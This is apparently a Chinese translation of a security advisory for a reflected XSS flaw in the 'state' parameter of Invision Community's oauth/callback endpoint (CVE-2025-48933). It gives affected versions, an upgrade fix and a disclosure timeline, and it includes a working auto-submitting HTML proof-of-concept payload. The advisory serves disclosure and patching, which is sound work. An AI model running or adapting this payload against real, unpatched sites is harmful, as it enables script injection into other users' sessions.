Invision Community反射型XSS漏洞分析与修复方案

本文详细分析了Invision Community 5.0.7及以下版本在oauth/callback端点存在的反射型跨站脚本漏洞,包含受影响版本、漏洞原理、PoC示例及修复时间线,并提供了CVE编号和官方解决方案。

Invision Community <= 5.0.7 (oauth/callback) 反射型跨站脚本漏洞

软件链接

https://invisioncommunity.com

受影响版本

  • 4.7.21之前的特定4.x版本
  • 5.0.8之前的所有5.x版本

漏洞描述

传递给/oauth/callback/index.php脚本的"state" POST参数中的用户输入在生成HTML输出前未经过适当清理。攻击者可利用此漏洞执行反射型跨站脚本(XSS)攻击。

漏洞验证

通过诱骗受害者用户打开如下HTML页面即可利用该漏洞:

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
<html>
 <form method="POST">
  <input type="hidden" name="state" />
 </form>
 <script>
  var target = "https://invisioncommunity.com/forums/";
  var form = document.forms[0];
  form.action = target + "oauth/callback/index.php";
  form.childNodes[1].value = '1-' + btoa(target) + '-2-"><script>alert("XSS on "+document.domain)<\/script>';
  form.submit();
 </script>
</html>

解决方案

升级至4.7.21、5.0.8或更高版本。

披露时间线

  • [2025年5月16日] - 通知厂商
  • [2025年5月27日] - 发布4.7.21版本
  • [2025年5月28日] - 发布5.0.8版本
  • [2025年5月28日] - 请求CVE标识符
  • [2025年5月28日] - 分配CVE标识符
  • [2025年7月23日] - 公开披露

CVE参考

通用漏洞披露计划(cve.org)已将此漏洞命名为CVE-2025-48933。

致谢

漏洞由Egidio Romano发现。

原始公告

http://karmainsecurity.com/KIS-2025-05

comments powered by Disqus
使用 Hugo 构建
主题 StackJimmy 设计